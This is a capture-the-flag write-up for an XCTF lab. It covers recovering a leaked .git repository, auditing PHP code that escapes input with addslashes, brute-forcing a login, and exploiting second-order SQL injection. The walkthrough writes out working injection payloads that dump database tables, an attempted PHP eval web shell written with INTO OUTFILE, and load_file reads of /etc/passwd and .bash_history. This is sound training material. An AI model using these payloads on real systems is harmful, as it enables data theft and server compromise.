Keyword
git library leak code audit addslashes secondary injection sql injection mysql hex query
Table of contents
3. Analysis of git library code version information
Secondary Injection Exploitation
foreword
Git is an open source distributed version control system for agile and efficient handling of any project, small or large. At present, a large number of developers use git for version control and automatic deployment of the site. If not configured properly, the .git folder may be deployed directly to the live environment. This causes the git leak vulnerability. An attacker can use this vulnerability to download all the contents of the git folder. If there is sensitive information in the file, such as site source code, database account password, etc., the attacker may attack the server by collecting the information......
original address
Offense and Defense World (xctf.org.cn) https://adworld.xctf.org.cn/challenges/list
After entering the question---log in and see the message board
Redirected to a login page after trying to post
The placeholder attribute in the form seems to indicate that the username is zhangwei and the password starts with zhangwei***. Here we can try whether there is sql injection in the form! Use the universal password' or '1 or zhangwei'# But all failed, if it doesn't work, just run the dictionary...
Look at the traffic information just now. When we click the submit button, the form will submit information to write_do.php?do=write, but there may be no login status and it will be redirected to the login.php page, allowing us to log in.
These are all prefaces. The git library is the focus of this ctf question.
Git repository leak
1.git library discovery
Using dirsearch to scan the directory, we found that there is a git library directory
dirsearch -u http://61.147.171.105:56303/
Trying to download the .git library. Access to the git directory is prohibited. At this time, you need to use a script!
┌──(kali㉿kali)-[~] └─$ wget -r http://61.147.171.105:56303/.git
--2023-0x-xx 08:31:09-- http://61.147.171.105:56303/.git Connecting to 61.147.171.105:56303... connected. HTTP request sent, awaiting response... 301 Moved Permanently Location: http://61.147.171.105:56303/.git/ [following] --2023-0x-xx 08:31:09-- http://61.147.171.105:56303/.git/ Reusing existing connection to 61.147.171.105:56303. HTTP request sent, awaiting response... 403 Forbidden 2023-0x-xx 08:31:09 ERROR 403: Forbidden.
2.git library download
Download GitHack
git clone GitHub - BugScanTeam/GitHack: .git Leak Exploitation Tool to Restore Historical Versions
GitHub - BugScanTeam/GitHack: .git leak exploit tool that restores past versions. git leak exploit tool that restores past versions. Contribute to BugScanTeam/GitHack development by creating an account on GitHub. https://github.com/BugScanTeam/ GitHack tries to download the git library
python2 GitHack.pyhttp://61.147.171.105:56303/.git/
3. Analysis of git library code version information
Go to the folder created by github and prepare to use the git command
cd 61.147.171.105_56303 ; ls
This code framework does not seem to be finished yet.
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
break;
case 'comment':
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>
There will be several states for file modification (addition, deletion, update) in the Git working directory, and the state of these modifications will change as we execute Git commands.
Our main focus is to focus on the commit log
git log --reflog
You can see that there are three version information in history and there is comment information currently in the first version information location
git reflog
The query through the git command also verified that the author deliberately rolled back the version information to the bfbd21 version. But in fact, we can still go back to the e5b2 version by means, which also shows that the version rollback is not to delete the previous version.
Here I use the diff command to see what has been added and modified between each version, which is convenient for code auditing.
The first version and the second version without any modification
Compare the first version with the third version
└─$ git diff bfbdf218902476c5c6164beedd8d2fcf593ea23b e5b2a2443c2b6d395d06960123142bc91123148c
The version falls back to the e5b2 version to view the code
git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c
cat write_do.php
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>
sql secondary injection
Do code audit (analysis is in comments)
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");//没有sess信息 重定向到login.php 所以必须先登录了
die();
}
if(isset($_GET['do'])){//get传参do
switch ($_GET['do'])
{
case 'write'://?do=write
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);//输入category title content参数下的特殊字符会被addslashes转义。
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);//执行插入sql语句
header("Location: ./index.php");
break;
//通过网络收索 addslashes sql注入 我们得到了一条重要的线索 addslashes存在二次注入的可能
//参考链接https://blog.csdn.net/weixin_52501704/article/details/126863948
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);//这里果然进行了再次查询
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];//category可控 可以进行拼接sql注入
$content = addslashes($_POST['content']);//获取content 将一些表board更新到commnet表中
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
//假如输入是以下数据 /**/多行注释 #单行注释
//$category = 1',content=database(),/*
//content = */#
$sql = "insert into comment
set category = '1',content=database(),/*',
content = '*/#',
bo_id = '$bo_id'";
$result = mysql_query($sql);//执行存在二次注入风险的sql语句
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>
The figure below shows that */# will not add backslashes after addslashes
Although addslashes turns ' into \', the backslashes are gone when inserted into the database
There is a possibility of secondary injection in addslashes. Refer to Study Notes-SQL Injection-2_addslashes SQL Injection_H1111B’s Blog-CSDN Blog SQL Injection-Secondary Injection (Principle) https://blog.csdn.net/weixin_52501704/article/details/126863948
The principle of secondary injection, when inserting data into the database for the first time, only uses addslashes or uses get_magic_quotes_gpc to escape the special characters in it, but addslashes has a feature that although the parameters will be added after filtering ' \' for escaping, but '\' will not be inserted into the database, and the original data will be retained when writing to the database.
We need to obtain a login session before exploiting the vulnerability
Blast user password
Blast user zhangwei password
1. Add parameters in selection mode under intruder
2. Set playload
3. Analysis result password zhangwei666
Secondary Injection Exploitation
Logged in, ready to post and submit to write_do.php?do=write
Through the analysis, we also know that the place to submit the message is the secondary injection part of the content we are looking for
input content = */#
As expected, the return here is different. There is indeed a second SQL injection, which also shows that the current database is ctf.
Construct sql injection point
1', content=(select 123), /*
Query table 1' under the database ctf , content=(select group_concat(table_name) from information_schema.tables where table_schema='ctf'), /*
(content = */# )
查询表user字段
1',content=(Select group_concat(column_name) from information_schema.columns where table_name='user'),/*
return field
留言</label><div class="col-sm-5"><p>id,username,password,Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,Event_priv,Trigger_priv,Create_tablespace_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections,plugin,authentication_string
Information under the query field
1', content=(select concat_ws(':', id, username, password) from user), /*
After tossing for a long time, trying to find the clue of the flag in the sql database failed.
See if there is any export and import permission. It is really hard to check under the current conditions. Then we directly try to write the Trojan into it and guess that the website directory is under /var/www
select '<?php @eval($_get["cmd"])?>' into outfile "/var/www/shell.php"
1',content=(select '<?php @eval($_get["cmd"])?>' into outfile "/var/www/shell.php" ),/*
1',content=(select 123 into outfile "/var/www/shell.txt" ),/*
I have tried a lot here, it seems that the one-sentence Trojan horse has been filtered, and 123 has not been imported successfully.
Then use load_file to look at other important files to collect specialized dictionaries to collect as much information as possible
reference dictionary
1',content=(select load_file('/etc/passwd')),/*
Found the www user's attempts to access the user's execution command history
1',content=(select load_file('/home/www/.bash_history')),/*
Enter cd /tmp, unzip the package html.zip and copy it to /var/www/, enter /var/www and delete the file .DS_Store
You can go to tmp to see what hidden things are stored in the deleted .DS_Store
1',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
Is this a normal string? Copy it
mysql hex query
There are indications that this file is not generally good because mysql provides the hex function and we extract the binary data of this file
1',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
At this time, a large piece of binary data was obtained
For binary data, I provide two decodings here
00000001427564310000100000000800000010000000040A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000002000000001000000400000000100000080000000010000010000000001000002000000000100000400000000000000000100001000000000010000200000000001000040000000000100008000000000010001000000000001000200000000000100040000000000010008000000000001001000000000000100200000000000010040000000000001008000000000000101000000000000010200000000000001040000000000000108000000000000011000000000000001200000000000000140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000104445344420000000100000000000000000000000000000000000000000000000200000020000000600000000000000001000000800000000100000100000000010000020000000000000000020000080000001800000000000000000100002000000000010000400000000001000080000000000100010000000000010002000000000001000400000000000100080000000000010010000000000001002000000000000100400000000000010080000000000001010000000000000102000000000000010400000000000001080000000000000110000000000000012000000000000001400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
CyberChef (gchq.github.io)https://gchq.github.io/CyberChef/
input hex into
The second uses the HEX tool
Create a new file txt, open the file with hex, fill in the binary data, and you can see the decoding information on the right
Page access This file does exist, but there is no content. Use sql for secondary injection again.
1',content=(select load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*
in source code
get the flag
$flag="flag{0dd14aae81d94904b3492117e2a3d4df}
Refer to web resources
git exploit tool
https://github.com/BugScanTeam/GitHack
sql secondary injection addslashes
study notes-SQL injection-2_addslashes sql injection_H1111B's Blog-CSDN Blog
Git Library Use Tutorial-Dark Horse Programmer
Dark Horse Programmer Git Complete Tutorial, Complete Git Project Management Tool Tutorial, A Set of Proficient Git_哔哩哔哩_bilibili
File contains dictionary reference file
Auto_Wordlists/wordlists at main carlospolop/Auto_Wordlists GitHub
hex decoding
CyberChef
HEX to character hexadecimal to character hex gb2312 gbk utf8 Chinese character internal code conversion- The X Online Tools